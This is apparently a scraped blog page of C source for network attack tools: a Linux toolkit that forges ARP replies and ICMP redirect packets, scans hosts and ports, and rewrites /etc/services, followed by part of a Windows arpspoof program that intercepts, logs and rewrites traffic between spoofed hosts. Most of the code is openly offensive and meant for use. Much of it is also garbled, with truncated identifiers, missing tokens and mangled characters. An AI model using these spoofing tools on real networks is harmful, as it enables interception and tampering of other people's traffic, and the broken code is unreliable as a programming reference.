",bp->bh_datalen);#endifbpf_len-=BPF_WORDALIGN(bp->bh_hdrlen+bp->bh_caplen);#elseif( (len=read(s,recv_buff,4096))<0 ){perror("read");exit(0);}rp=rpo=recv_#endifeth=(struct ether_header *)rp=rp+sizeof(struct ether_header);if( memcmp(eth->ether_dhost,mac_addr,6)!=0&& memcmp(eth->ether_shost,mac_addr,6)!=0&& ntohs(eth->ether_type)==ETHERTYPE_ARP){arp=(struct ether_arp *)if( dst_ip==*(int *)(arp->arp_spa)){static char zero[6];static char one[6]={0xff,0xff,0xff,0xff,0xff,0xff};printf("Hit............Linuxcici");print_ethernet(eth);print_arp(arp);sp=send_buff+sizeof(struct ether_header);if(flag==REPLY){make_arp((struct ether_arp *)sp,ARPOP_REPLY,mac_addr,arp->arp_tpa,arp->arp_sha,arp->arp_sha);make_ethernet((struct ether_header *)send_buff,arp->arp_sha,mac_addr,ETHERTYPE_ARP);}else if (flag==REQUEST){make_arp((struct ether_arp *)sp,ARPOP_REQUEST,mac_addr,arp->arp_spa,zero,arp->arp_tpa);make_ethernet((struct ether_header *)send_buff,one,mac_addr,ETHERTYPE_ARP);}else{make_arp((struct ether_arp *)sp,ARPOP_REQUEST,mac_addr,arp->arp_tpa,zero,arp->arp_spa);make_ethernet((struct ether_header *)send_buff,arp->arp_sha,mac_addr,ETHERTYPE_ARP);}len=sizeof(struct ether_header)+sizeof(struct ether_arp);usleep(500*1000);#ifndef __linuxif(write(s,send_buff,len)<0){perror("write");exit(0);}#elseif(sendto(s,send_buff,len,0,&sa,sizeof(sa))<0){perror("sendto");exit(0);}#endifprintf("SEND---------------------my Master linuxcici");print_ethernet((struct ether_header *)send_buff);print_arp((struct ether_arp *)sp);}}}exit(1);}void make_ethernet(struct ether_header *eth,u_char *ether_dhost,u_char *ether_shost,u_short ether_type){memcpy(eth->ether_dhost,ether_dhost,6);memcpy(eth->ether_shost,ether_shost,6);eth->ether_type=htons(ether_type);}void make_arp(struct ether_arp *arp,int op,u_char *arp_sha,u_char *arp_spa,u_char *arp_tha,u_char *arp_tpa){arp->arp_hrd=htons(1);arp->arp_pro=htons(ETHERTYPE_IP);arp->arp_hln=6;arp->arp_pln=4;arp->arp_op=htons(op);memcpy(arp->arp_sha,arp_sha,6);memcpy(arp->arp_spa,arp_spa,4);memcpy(arp->arp_tha,arp_tha,6);memcpy(arp->arp_tpa,arp_tpa,4);}/***************************** arp_attack ************************************//***************************** scan_route ************************************/void scan_route(int argc,char *argv[]){struct packet_struct sockaddr_in send_int send_ int recv_ u_char buff[512];struct timeval tvm0;struct timeval tvm1;fd_int on=1; int dns_flg=0;if(argc==3 && strcmp(argv[1],"-n")==0){dns_flg=1; argv[1]=argv[2]; argv[2]=NULL;argc=2;}if(argc!=2){fprintf(stderr, "usage: %s [-n] dst_ip
",argv[CMD_NAME]);exit(EXIT_FAILURE);}memset( (char *)&send_sa,0,sizeof(struct sockaddr_in) );send_sa.sin_family=AF_INET;if( (send_sa.sin_addr.s_addr=inet_addr(argv[DST_IP3]))==INADDR_NONE ){struct hostent * if( (he=gethostbyname(argv[DST_IP3]))==NULL ){fprintf(stderr,"unknow host %s
",argv[DST_IP3]);exit(EXIT_FAILURE);}send_sa.sin_family=he->h_ memcpy( (char *)&(send_sa.sin_addr),he->h_addr,sizeof(he->h_length) ); }if( (send_sd=socket(AF_INET, SOCK_RAW,IPPROTO_RAW))<0 ){perror("socket(SOCK_RAW)");exit(EXIT_FAILURE);} if( setsockopt(send_sd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on))<0 ){perror("setsockopt(IPPROTO_IP,IP_HDRINCL)");exit(EXIT_FAILURE);}if( (recv_sd=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0 ) {perror("socket(SOCKET_RAW)");exit(EXIT_FAILURE);}len=sizeof(struct packet_udp);memset( (char *)&sendpacket,0,sizeof(struct packet_udp) ); make_udp_header(&(sendpacket.udp)); make_ip_header2(&(sendpacket.ip),0,send_sa.sin_addr.s_addr,len);printf("scanroute %s
",inet_ntoa(send_sa.sin_addr)); for(ttl=1;ttl<=64;ttl++){printf("%2d:",ttl); fflush(stdout); sendpacket.ip.ip_ttl=for(i=0;i<3;i++){if(sendto(send_sd,(char *)&sendpacket,len,0,(struct sockaddr *)&send_sa,sizeof (send_sa))<0){perror("sendto");exit(EXIT_FAILURE);}gettimeofday(&tvm0,(struct timezone *)0);tv.tv_sec=3;tv.tv_usec=0;reread:FD_ZERO(&readfd); FD_SET(recv_sd,&readfd);if( (select(recv_sd+1, &readfd,NULL,NULL,&tv))>0 ){ struct icmp * struct ip *struct hostent * char hostip[256];struct in_if( recvfrom(recv_sd,buff,512,0,NULL,NULL)<0 ){perror("recvfrom");exit(EXIT_FAILURE);}ip=(struct ip *)hlen=ip->ip_hl<<2; if( ip->ip_p !=IPPROTO_ICMP)icmp=(struct icmp *)(buff+hlen);if( (icmp->icmp_type!=ICMP_TIMXCEED|| icmp->icmp_code !=ICMP_TIMXCEED_INTRANS)&& (icmp->icmp_type!=ICMP_UNREACH_PORT) ) gettimeofday(&tvm1,(struct timezone *)0);tvsub(&tvm1,&tvm0);memcpy(&ipaddr,&(ip->ip_src.s_addr),sizeof (ipaddr));strcpy(hostip,inet_ntoa(* (struct in_addr *)&(ip->ip_src.s_addr)));if(dns_flg==1)printf("% -15s",hostip);else if( (host=gethostbyaddr( ( char *)&ipaddr,4,AF_INET))==NULL )printf(" % -15s(%s)",host,hostip); else printf("% -15s(%s)",hostip,host->h_name); printf(": RTT= %8.4fms",tvm1.tv_sec * 1000.0 +tvm1.tv_usec/1000.0);if(icmp->icmp_type==ICMP_UNREACH_PORT){printf("Reach !
");}else}else{printf("unknow
");fflush(stdout);}}printf("
");}exit:close(send_sd);close(recv_sd);exit(1);}void make_ip_header2(struct ip *ip,int srcip,int dstip,int iplen){memset( (char *)ip,0,sizeof(struct ip) );ip->ip_v=IPVERSION;ip->ip_hl=sizeof(struct ip) >> 2;ip->ip_id=htons(0);ip->ip_off=0;#ifdef _linux_ ip->ip_len=htons(iplen);ip->ip_off=htons(0); #else ip->ip_len=ip->ip_off=0;#endif ip->ip_ttl=64; ip->ip_p=IPPROTO_UDP; ip->ip_src.s_addr=ip->ip_dst.s_addr= ip->ip_sum=0;ip->ip_sum=checksum( (u_short *)ip,sizeof(struct ip) );}/***************************** scan_route ************************************//***************************** redirect ************************************/void redirect(int argc,char *argv[]){struct sockaddr_unsigned char buff[1500]; struct ip *ip_ struct ip *ip_ struct icmp * struct udphdr *
int on=1; if(argc!=5){fprintf(stderr,"usage %s targetd_host old_router new_router dst_ip
",argv[CMD_NAME]); exit(EXIT_FAILURE);}if(setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on))<0){perror("setsockopt(IP_HDRINCL)"); exit(EXIT_FAILURE);} ip_new=(struct ip *)(buff); icmp=(struct icmp *)(buff+20); ip_old=(struct ip *)(buff+20+8); udp=(struct udphdr *)(buff+20+8+20); size=20+8+20+8; make_udp_header(udp); make_ip_header(ip_old,inet_addr(argv[TARGET_IP]),inet_addr(argv[DST_IP1]),IPPROTO_UDP,100);make_icmp5_header(icmp,inet_addr(argv[NEW_ROUTER])); make_ip_header(ip_new,inet_addr(argv[OLD_ROUTER]), inet_addr(argv[TARGET_IP]),IPPROTO_ICMP,size);memset( (char *)&dest,0,sizeof(dest) ); dest.sin_family=AF_INET; dest.sin_addr.s_addr=inet_addr(argv[TARGET_IP]);if( sendto (s,buff,size,0,(struct sockaddr *)&dest,sizeof(dest))<0 ){perror("sendto"); exit(EXIT_FAILURE);}exit(1);}void make_udp_header(struct udphdr *udp){#ifdef _FAVOR_BSD_udp->uh_sport=htons(0); udp->uh_ulen=htons( (u_short)sizeof(struct udphdr) ); udp->uh_dport=htons(33434); udp->uh_sum=htons(0);#elseudp->source=htons(0); udp->len=htons( (u_short)sizeof(struct udphdr) ); udp->dest =htons(33434); udp->check=htons(0);#endif}void make_ip_header(struct ip *ip,int target_ip,int dst_ip,int proto,int iplen){memset( (char *)ip,0,sizeof(struct ip) ); ip->ip_v=IPVERSION; ip->ip_hl=sizeof(struct ip) >> 2; ip->ip_id=htons(0); ip->ip_off=0; #ifdef _linux_ ip->ip_len=htons(iplen); ip->ip_off=htons(IP_DF); #else ip->ip_len= ip->ip_off=IP_DF; #endif ip->ip_ttl=2; ip->ip_p= ip->ip_src.s_addr=target_ ip->ip_dst.s_addr=dst_ ip->ip_sum=0; ip->ip_sum=checksum( (u_short *)ip,sizeof(struct ip) );}void make_icmp5_header( struct icmp *icmp,u_int gw_ip ){icmp->icmp_type=ICMP_REDIRECT; icmp->icmp_code=ICMP_REDIRECT_HOST; icmp->icmp_gwaddr.s_addr=gw_ icmp->icmp_cksum=0; icmp->icmp_cksum=checksum( (u_short *)icmp,8+20+8 );}/***************************** redirect ************************************//***************************** scan udp port ************************************/void scan_uport(int argc,char *argv[]){printf("
Running scan udp port programe my master linuxcici
");getchar();struct icmp *fd_set select_struct sockaddr_in send_int send_sd,recv_char buff[8192];if(argc!=5){fprintf(stderr,"usage:%s dst_ip start_ip last_port
",argv[CMD_NAME]);exit(EXIT_FAILURE);}send_sa.sin_family=AF_INET;send_sa.sin_addr.s_addr=inet_addr(argv[DST_IP]);startport=atoi(argv[START_PORT]);endport=atoi(argv[LAST_PORT]);if((send_sd=socket(AF_INET,SOCK_DGRAM,0))<0){perror("socket(SOCK_DGRAM)");exit(EXIT_FAILURE);}if((recv_sd=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){perror("socket(SOCKET_RAW)");exit(EXIT_FAILURE);}for( dstport=dstport<=dstport++ ){printf("scan port%d
",dstport);fflush(stdout);send_sa.sin_port=htons(dstport);sendto(send_sd,NULL,0,0,(void *)&send_sa,sizeof(send_sa));tv.tv_sec=1;tv.tv_usec=0;while(1){FD_ZERO(&select_fd);FD_SET(recv_sd,&select_fd);if( select(recv_sd+1,&select_fd,NULL,NULL,&tv)<=0 )struct ip *if(recvfrom(recv_sd,buff,8192,0,NULL,NULL)!=56) ip=(struct ip *)hlen=ip->ip_hl<<2;icmp=(struct icmp *)(buff+hlen);port=ntohs(*(u_short *)(buff+20+8+20+2));if((ip->ip_src.s_addr!=send_sa.sin_addr.s_addr)||(icmp->icmp_type!=ICMP_UNREACH)||(icmp->icmp_code!=ICMP_UNREACH_PORT)||(port!=dstport) )else {struct servent *se=getservbyport(htons(dstport),"udp");printf("%5d %-20s
",dstport,(se==NULL)? "unknow":se->s_name);} }}printf("
THXY College
");printf("it's done my master Linuxcici
");exit(1);}/***************************** scan udp port ************************************//***************************** scan port ************************************/void scan_port(int argc,char *argv[]){printf("
Running scan port programe my master linuxcici
");getchar();struct icmp *fd_set select_struct sockaddr_in send_int send_sd,recv_char buff[8192];if(argc!=5){fprintf(stderr,"usage:%s dst_ip start_ip last_port
",argv[CMD_NAME]);exit(EXIT_FAILURE);}send_sa.sin_family=AF_INET;send_sa.sin_addr.s_addr=inet_addr(argv[DST_IP]);startport=atoi(argv[START_PORT]);endport=atoi(argv[LAST_PORT]);if((send_sd=socket(AF_INET,SOCK_DGRAM,0))<0){perror("socket(SOCK_DGRAM)");exit(EXIT_FAILURE);}if((recv_sd=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){perror("socket(SOCKET_RAW)");exit(EXIT_FAILURE);}for( dstport=dstport<=dstport++ ){printf("scan port%d
",dstport);fflush(stdout);send_sa.sin_port=htons(dstport);sendto(send_sd,NULL,0,0,(void *)&send_sa,sizeof(send_sa));tv.tv_sec=1;tv.tv_usec=0;while(1){FD_ZERO(&select_fd);FD_SET(recv_sd,&select_fd);if( select(recv_sd+1,&select_fd,NULL,NULL,&tv)<=0 )struct ip *if(recvfrom(recv_sd,buff,8192,0,NULL,NULL)!=56)ip=(struct ip *)hlen=ip->ip_hl<<2;icmp=(struct icmp *)(buff+hlen);port=ntohs(*(u_short *)(buff+20+8+20+2));if((ip->ip_src.s_addr!=send_sa.sin_addr.s_addr)||(icmp->icmp_type!=ICMP_UNREACH)||(icmp->icmp_code!=ICMP_UNREACH_PORT)||(port!=dstport) )else {struct servent *se=getservbyport(htons(dstport),"udp");printf("%5d %-20s
",dstport,(se==NULL)? "unknow":se->s_name);} }}printf("
THXY College
");printf("it's done my master Linuxcici
");exit(1);}/***************************** scan port ************************************//******************************** scan host ***********************************/void scan_host(int argc,char *argv[]){printf("
Running scan host programe my master linuxcici
");getchar();struct sockaddr_in send_char send_buff[PACKET_LEN];char recv_buff[BUFSIZE];fd_struct ip *if(argc!=4){fprintf(stderr,"usage %s start_ip last_ip
",argv[CMD_NAME]);exit(EXIT_FAILURE);}startip=ntohl(inet_addr(argv[START_IP]));endip=ntohl(inet_addr(argv[LAST_IP]));memset( (char *)&send_sa,0,sizeof(struct sockaddr_in) );send_sa.sin_family=AF_INET;if( (s=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP) )<0){perror("socket(SOCK_RAW,IPPRPTO_ICMP)");exit(EXIT_FAILURE);}for(dstip=dstip<=dstip++){send_sa.sin_addr.s_addr=htonl(dstip);for(i=0;i<3;i++){printf("scan %s(%d)
",inet_ntoa(send_sa.sin_addr),i+1);fflush(stdout);make_icmp8_packet((struct icmp *)send_buff,PACKET_LEN,i);if( sendto(s,(char *)&send_buff,PACKET_LEN,0,(struct sockaddr *)&send_sa,sizeof(send_sa))<0 ){perror("sendto");exit(EXIT_FAILURE);}tv.tv_sec=0;tv.tv_usec=200*1000;while(1){FD_ZERO(&readfd); FD_SET(s,&readfd);if( (select(s+1,&readfd,NULL,NULL,&tv) ) <=0 )if( recvfrom(s,recv_buff,BUFSIZE,0,NULL,NULL)<0 ){perror("recvfrom");exit(EXIT_FAILURE);}ip=(struct ip*)recv_hlen=ip->ip_hl<<2; if(ip->ip_src.s_addr==send_sa.sin_addr.s_addr){struct icmp *icmp=(struct icmp *)(recv_buff+hlen);if(icmp->icmp_type==ICMP_ECHOREPLY){printf(" %-15s",inet_ntoa(*(struct in_addr *)&(ip->ip_src.s_addr)));gettimeofday(&tv,(struct timezone *)0);tvsub(&tv,(struct timeval *)(icmp->icmp_data));printf(": RTT=%8.4fms
",tv.tv_sec*1000.0+tv.tv_usec/1000.0);goto exit_}} }} exit_loop: ;}close(s);printf("
THXY College
");printf("it's done my master Linuxcici
");exit(1);}/******************************** scan host ***********************************//******************************** kill server ***********************************/char* yi_wei(char *server_save,int flag){char *r_w,*p;r_w=(char *)malloc(100* sizeof(char)); if(flag==1){*(r_w)='#';for(i=0;*(server_save+i)!=''&&*(server_save+i)!='
';i++)*(r_w+i+1)=*(server_save+i);*(r_w+i+1)='
';*(r_w+i+2)='';}else{for(i=0;*(server_save+i)!=''&&*(server_save+i)!='
';i++){if( *(server_save+i+1)=='')*(r_w+i)=*(server_save+i+1);*(r_w+i+1)='';}}memset(server_save,' ',100);strcpy(server_save,r_w);free(r_w);return server_}void off(int argc,char *argv[],char *server_save,FILE *tmp_s){char *p,*f_s;int i=0,count=0;for(;*(argv[3]+i)!='';i++ ){if( *(argv[3]+i)==*(server_save+i) ) count++;}if(i==count){f_s=yi_wei(server_save,1);int i=0;i=0;while( *(server_save+i)!=''){fputc(*(server_save+i),tmp_s);i++;}}else{int b=0;while( *(server_save+b)!=''){fputc(*(server_save+b),tmp_s);b++;}}}void on(int argc,char *argv[],char *server_save,FILE *tmp_s){char *p,*f_s;int i=0,count=0; for(;*(argv[3]+i)!='';i++ ){if( (*(argv[3]+i)==*(server_save+i+1) )&& *(server_save)=='#') count++;}if(i==count){f_s=yi_wei(server_save,0); int i=0;i=0;while( *(server_save+i)!=''){fputc(*(server_save+i),tmp_s);i++;}}else{int b=0;while( *(server_save+b)!=''){fputc(*(server_save+b),tmp_s);b++;}}}void kill_serve(int argc, char *argv[]){char server_save[100];char *server_name="/etc/services";char *tmp_name="/etc/tmp_linux";int server_FILE *server_file,*tmp_s;if(argc<4){printf("
usage: the wrong argument open/close+servername
");exit(0);}if((server_file=fopen(server_name,"r+"))==NULL){perror("can't not open server process");exit(0);}if((tmp_s=fopen(tmp_name,"w+"))==NULL){perror("can't not open server process");exit(0);}fseek(server_file,0,SEEK_SET);if( strcmp("OPEN",argv[2])==0){server_state=OPEN;}else if( strcmp("CLOSE",argv[2])==0){server_state=CLOSE;}else{printf("usage : it's not open or close
");exit(0);}while(( fgets(server_save,100,server_file) )){if(server_state==OPEN)on(argc,argv,server_save,tmp_s);if(server_state==CLOSE)off(argc,argv,server_save,tmp_s);memset(server_save,' ',100);}if(unlink("/etc/services")<0){perror("unlink failure");exit(0);}if( chdir("/etc")<0){perror("can't chdir");exit(0);} if(rename("/etc/tmp_linux","/etc/services")<0){perror("rename failure");exit(0);}printf("THXY College
");printf("
nmy Master linuxcici, it's done
");fclose(server_file); fclose(tmp_s); exit(1);}/******************************** kill server **********************************/void dump_packet(unsigned char *buff,int len){int i,j;printf("FrameDump:
");for(i=0;i<i+=16){for(j=i;j<i+16 && j< j++){printf("%02x",buff[j]);if(j%2==1)printf(" ");}if(j==len && len % 16!=0)for(j=0;j<40-(len%16)*2.5;j++)printf(" ");printf(":");for(j=i;j<i+16 && j<j++){if( (buff[j]>=0x20)&&(buff[j]<=0x7e))putchar(buff[j]);elseprintf(".");}printf("
");}fflush(stdout);}void print_udp(struct udphdr *udp){#ifdef _FAVOR_BSD_printf("Protocol:UDP
");printf("Source Port:%5u
Dest Port:%5u
",ntohs(udp->uh_sport),ntohs(udp->uh_dport));printf("Length:%5u Checksum%5u
",ntohs(udp->uh_ulen),ntohs(udp->uh_sum));#elseprintf("Protocol:UDP
");printf("Source Port:%5u
Dest Port:%5u
",ntohs(udp->source),ntohs(udp->dest));printf("Length:%5u Checksum%5u
",ntohs(udp->len),ntohs(udp->check));#endif}char *tcp_ftoa(int flag){static int f[]={'U','A','P','R','S','F'};static char str[17];u_int mask=1<<5;for(i=0;i<6;i++){if( ((flag<<i)&mask)!=0 )str[i]=f[i];elsestr[i]='0';}str[i]='';}void print_tcp(struct tcphdr *tcp){#ifndef __linuxprintf("Protocol:TCP
");printf("Source Port:%5u
Destination Port %5u
",ntohs(tcp->th_sport),ntohs(tcp->th_dport));printf("Sequence Number:%10lu
",(u_long)ntohl(tcp->th_seq));printf("Acknowledgement Number :%10lu
",(u_long)ntohl(tcp->th_ack));printf("Do: %2u
Reserved F:%6s
Window size:%5u
",tcp->th_off,tcp_ftoa(tcp->th_flag),ntohs(tcp->th_win));printf("Checksum: %5u
Urgent Pointer: %5u ",ntohs(tcp->th_sum),ntohs(tcp->th_urp));#elseprintf("Protocol:TCP
");printf("Source Port:%5u
Destination Port %5u
",ntohs(tcp->source),ntohs(tcp->dest));printf("Sequence Number:%10lu
",(u_long)ntohl(tcp->seq));printf("Acknowledgement Number :%10lu
",(u_long)ntohl(tcp->ack_seq));printf("Do: %2u
Window size:%5u
",tcp->doff,ntohs(tcp->window));printf("Checksum: %5u
Urgent Pointer: %5u ",ntohs(tcp->check),ntohs(tcp->urg_ptr));#endif }void print_icmp(struct icmp *icmp){static char *type_name[]={"Echo Reply","Undefine","Undefine","Destination Unreachable","Source Quench","Redirect(changeroute)","Undefine","Undefine","Echo Request","Undefine","Undefine","Time Exceeded","Parameter Problem","Timestamp Request","Timestamp Reply","Infromation Reply","Address Mask Request","Address Mask Reply","Unknow",};int type=icmp->icmp_if(type10)type=19;printf("Protocol: ICMP(%s)
",type_name[type]);printf("Type: %3u
Checksum:%5u
",icmp->icmp_type,icmp->icmp_code,ntohs(icmp->icmp_cksum));if( icmp->icmp_type==0 || icmp->icmp_type==8 ){printf("Identification: %5u
Sequence Number: %5u
",ntohs(icmp->icmp_id),ntohs(icmp->icmp_seq));printf("-------------------------------------------
");}else if(icmp->icmp_type==3){if(icmp->icmp_code==4){printf("void:%5u
Next MTU:%5u
",ntohs(icmp->icmp_pmvoid),ntohs(icmp->icmp_nextmtu));printf("-------------------------------------------
");}else{printf("Unused:%10lu
",(u_long)ntohl(icmp->icmp_void));printf("-------------------------------------------
");}}else if(icmp->icmp_type==5){printf("Router IP Address:%15s
",inet_ntoa(*(struct in_addr *)&(icmp->icmp_gwaddr)));printf("-------------------------------------------
");}else if(icmp->icmp_type==11){printf("Unused: %10lu
",(u_long)ntohl(icmp->icmp_void));printf("-------------------------------------------
");}if( icmp->icmp_type==3 || icmp->icmp_type==5 || icmp->icmp_type==11 )print_ip( (struct ip *)( ((char *)icmp)+8 ) );}char *ip_ttoa(int flag){static int f[]={'1','1','1','D','T','R','C','X',};static char str[17];u_int mask=0x80;for(i=0;i<8;i++){if( ((flag<<i)&mask)!=0 )str[i]=f[i];elsestr[i]='0';}str[i]='';}char *ip_ftoa(int flag){static int f[]={'R','D','M'};static char str[17];u_int mask=0x8000; for(i=0;i<3;i++) {if( ((flag<<i)&mask)!=0 )str[i]=f[i];elsestr[i]='0';}str[i]='';}void print_ip(struct ip *ip){printf("Protocol: IP
");printf("IV: %1u
Total Length:%10u
",ip->ip_v,ip->ip_hl,ip_ttoa(ip->ip_tos),ntohs(ip->ip_len));printf("Identifier: %5u
",ntohs(ip->ip_id),ip_ftoa(ntohs(ip->ip_off)),ntohs(ip->ip_off)&IP_OFFMASK);printf("TTL:%3u
Header Checksum:%5u
",ip->ip_ttl,ip->ip_p,ntohs(ip->ip_sum));printf("Source IP Address: %15s
",inet_ntoa(* (struct in_addr *)&(ip->ip_src) ) );printf("Destination IP Address: %15s
",inet_ntoa( *(struct in_addr *)&(ip->ip_dst )) );}void print_arp(struct ether_arp *arp){static char *arp_operation[]={"Undefine","(ARP Request)","(ARP REPLY)","(RARP Request)","(RARP Reply)",};int op=ntohs(arp->ea_hdr.ar_op);if(op<=0 || 5<op) op=0;printf("Protocol:ARP
");printf("Hard Type: %2u %-11s
",ntohs(arp->ea_hdr.ar_hrd),(ntohs(arp->ea_hdr.ar_hrd)==ARPHRD_ETHER)?"(Ethernet)":"Not Ether" ); printf("Protocol: 0x%04x %-9s
",ntohs(arp->ea_hdr.ar_pro),(ntohs(arp->ea_hdr.ar_pro==ETHERTYPE_IP))? "(IP)":"(NOT IP)");printf("Hardlen :%3u
AddrLen:%2u
OP: %4d %16s
",arp->ea_hdr.ar_hln,arp->ea_hdr.ar_pln,ntohs(arp->ea_hdr.ar_op),arp_operation[op]);printf("Source MAX Address:%17s
",mac_ntoa(arp->arp_sha));printf("Source IP Address:%15s
",inet_ntoa(*(struct in_addr *)&arp->arp_spa));printf("Destination MAC Address: %17s
",mac_ntoa(arp->arp_tha));printf("Destination IP Address: %15s
",inet_ntoa(*(struct in_addr *)&arp->arp_tpa));}void print_ethernet(struct ether_header *eth){int type=ntohs(eth->ether_type);if(type<=1500)printf("IEEE 802.3 Ethernet Frame");elseprintf("Ethernet Fram:
");printf("Destination MAC Address:%17s
",mac_ntoa(eth->ether_dhost));printf("Source MAX Address:%15s
",mac_ntoa(eth->ether_shost));if(type<1500)printf("Length: %5u
",type);elseprintf("Ethernet Type: 0X%04x
",type);}char *mac_ntoa(u_char *d){static char str[50];sprintf(str,"%02x:%02x:%02x:%02x:%02x:%02x",d[0],d[1],d[2],d[3],d[4],d[5]);}#ifndef __linuxint open_buf(char *ifname){char buf[256];for(i=0;i<4;i++){sprintf(buf,"/dev/bpf%d",i);if( (bpfd=open(buf,O_RDWR,0))>0 )goto bpf_}fprintf(stderr,"cannot open BPF
");return -1;bpf_ok: ;strcpy(ifr.ifr_name,ifname);if( ioctl(bpfd,BIOCSETIF,&ifr)<0 ){sprintf(buf,"ioctl(BIOCSETIF,'%S')",ifname);perror(buf);return -1;}fprintf(stderr,"BPF readfrom '%s'(%s)
",ifr.ifr_name,buf);if(ioctl(bpfd,BIOCPROMISC,NULL)<0){perror("ioctl(BIOCPROMISC)");return -1;}i=1;if( ioctl(bpfd,BIOCIMMEDIATE,&i)<0 ){perror("ioctl(BIOCIMMEDIATE)");return -1;}}#endif void make_icmp8_packet( struct icmp *icmp,int len,int n ){memset( (char *)icmp,0,len );gettimeofday((struct timeval *)(icmp->icmp_data),(struct timezone *)0);icmp->icmp_type=ICMP_ECHO;icmp->icmp_code=0;icmp->icmp_id=0;icmp->icmp_seq=n;icmp->icmp_cksum=0;icmp->icmp_cksum=checksum((u_short *)icmp,len);}u_short checksum(u_short *data,int len){u_long sum=0;for(;len>1;len-=2){sum+=*data++;if(sum & 0x)sum=(sum & 0xffff)+(sum>>16);}if(len==1){u_short i=0;*(u_char *)(&i)=*(u_char *)sum+=i;}while(sum>>16)sum=(sum & 0xffff)+(sum>>16);return(sum==0xffff)? sum: ~}void tvsub(struct timeval *out ,struct timeval *in){if((out->tv_usec-=in->tv_usec)<0){out->tv_sec--;out->tv_usec+=1000000; }out->tv_sec-=in->tv_}
阅读(418) | 评论(0) | 转发(0) |
相关热门文章
给主人留下些什么吧!~~
请登录后评论。}
arpspoof.cpp
arpspoof.cpp:Code Content
#include&&stdio.h&
#include&&pcap.h&
#include&&winsock2.h&
#pragma&comment(lib,&&ws2_32.lib&)
#pragma&comment(lib,&&wpcap.lib&)
#include&&iphlpapi.h&
#include&&protoinfo.h&
#include&&spoof.h&
#include&&tcp.h&
#include&&scan.h&
#include&&replace.h&
//&存储要替换的字符串的链表结构
typedef&struct&tagSTRLINK
char&szOld[256];
char&szNew[256];
struct&tagSTRLINK&*
}STRLINK,&*PSTRLINK;
HANDLE&hThread[2];&//&两个发送RARP包的线程
unsigned&short&g_uP&//&要监视的端口号
pcap_t&*&//&网卡句柄
HANDLE&g_hE&//&捕捉&Ctrl+C
int&g_uM&//&欺骗标志&0&表示单向欺骗,&1表示双向欺骗
BOOL&bIsReplace&=&FALSE;&//&是否对转发的数据进行替换
BOOL&bIsLog&=&FALSE;&//&是否进行数据保存
char&szLogfile[MAX_PATH];&//&要保存数据的文件名
//&对应ARPSPOOF结构中的成员
unsigned&char&ucSelf[6],&ucIPA[6],&ucIPB[6];
char&szIPSelf[16],&szIPA[16],&szIPB[16],&szIPGate[16];
//&初始化链表
PSTRLINK&strLink&=&(PSTRLINK)&malloc(sizeof(STRLINK));
char&TcpFlag[6]={&'F','S','R','P','A','U'&};&//定义TCP标志位,分析数据包时用
BOOL&InitSpoof(char&**);
void&ResetSpoof();
void&Help();
//&格式化copy函数,主要是为了替换&'r',&'n'字符
BOOL&fstrcpy(char&*szSrc,&char&*szDst)
unsigned&int&i,&j;
for&(i&=&0,&j=0;&i&&&strlen(szSrc);&i++,&j++)
if&(szSrc[i]&==&'\'&&&&szSrc[i&+&1]&==&'r')&//&Replace&&r&
szDst[j]&=&'r';
else&if&(szSrc[i]&==&'\'&&&&szSrc[i&+&1]&==&'n')&//&Replace&&n&
szDst[j]&=&'n';
else&if&(szSrc[i]&!=&'n'&&&&szSrc[i]&!=&'�')
szDst[j]&=&szSrc[i];
return&TRUE;
szDst[j&+&1]&=&'�';&//&add&'�'
return&TRUE;
//&把文件中的规则存储到链表中
//&入口参数&szJobfile&==&&规则文件名
//&出口参数&strLink&&&==&&指向链表头的指针
BOOL&ReadJob(char&*szJobfile,&PSTRLINK&strLink)
char&szBuff[256],&*p&=&NULL;
if&((fp&=&fopen(szJobfile,&&rt&))&==&NULL)
printf(&Job&file&open&errorn&);
return&FALSE;
PSTRLINK&pTmp&=&strL&//&保存原指针
while&(fgets(szBuff,&sizeof(szBuff),&fp))
if&(strcmp(szBuff,&&----&))
memset(szBuff,&0,&sizeof(szBuff));
memset(strLink-&szOld,&0,&sizeof(strLink-&szOld));
fgets(szBuff,&sizeof(szBuff),&fp);
if&(!&fstrcpy(szBuff,&strLink-&szOld))
printf(&[!]&job&file&format&error&..n&);
return&FALSE;
fgets(szBuff,&sizeof(szBuff),&fp);
if&(strcmp(szBuff,&&----&))
memset(szBuff,&0,&sizeof(szBuff));
memset(strLink-&szNew,&0,&sizeof(strLink-&szNew));
fgets(szBuff,&sizeof(szBuff),&fp);
if&(!&fstrcpy(szBuff,&strLink-&szNew))
printf(&[!]&job&file&format&error&..n&);
return&FALSE;
printf(&Replace&Job&file&format&error,&
used&arpspoof&/n&release&a&new&job&filen&);
return&FALSE;
strLink-&next&=&(PSTRLINK)&malloc(sizeof(STRLINK));
strLink&=&strLink-&
strLink-&next&=&NULL;
fclose(fp);
strLink&=&pT&//&恢复原指针
return&TRUE;
//&把数据写入文件
//&入口参数:&szLogfile&==&&日志文件名&data&==&&指向数据块的空指针&size&==&&数据块大小
//&返回值类型&Boolean
BOOL&SaveLog(char&szLogfile[],&const&void&*data,&unsigned&int&size)
hFile&=&CreateFile(szLogfile,&GENERIC_WRITE,&FILE_SHARE_WRITE,&NULL,&
OPEN_ALWAYS,&FILE_ATTRIBUTE_NORMAL,&NULL);
if&(hFile&==&INVALID_HANDLE_VALUE)
return&FALSE;
SetFilePointer(hFile,&NULL,&NULL,&FILE_END);
WriteFile(hFile,&data,&size,&&dwBytes,&NULL);
CloseHandle(hFile);
return&TRUE;
//&捕获控制台事件的函数,主要是处理程序中断事务
BOOL&CtrlHandler(&DWORD&fdwCtrlType&)&
switch&(fdwCtrlType)&
//&Handle&the&CTRL-C&signal.&
&&&&case&CTRL_C_EVENT:&
&&&&case&CTRL_CLOSE_EVENT:&
&&&&case&CTRL_BREAK_EVENT:&&
&&&&case&CTRL_LOGOFF_EVENT:&
&&&&case&CTRL_SHUTDOWN_EVENT:
ResetSpoof();&//&&恢复欺骗主机的arp&cache
return&TRUE;
&&&&default:&
return&FALSE;
//&&为公用变量赋值,初始化参数
BOOL&InitSpoof(char&**argv)
//&IPSelf,&ucSelf&已经在打开网卡时初始化过了
memset(ucIPA,&0xff,&6);
memset(ucIPB,&0xff,&6);
memset(szIPA,&0&,16);
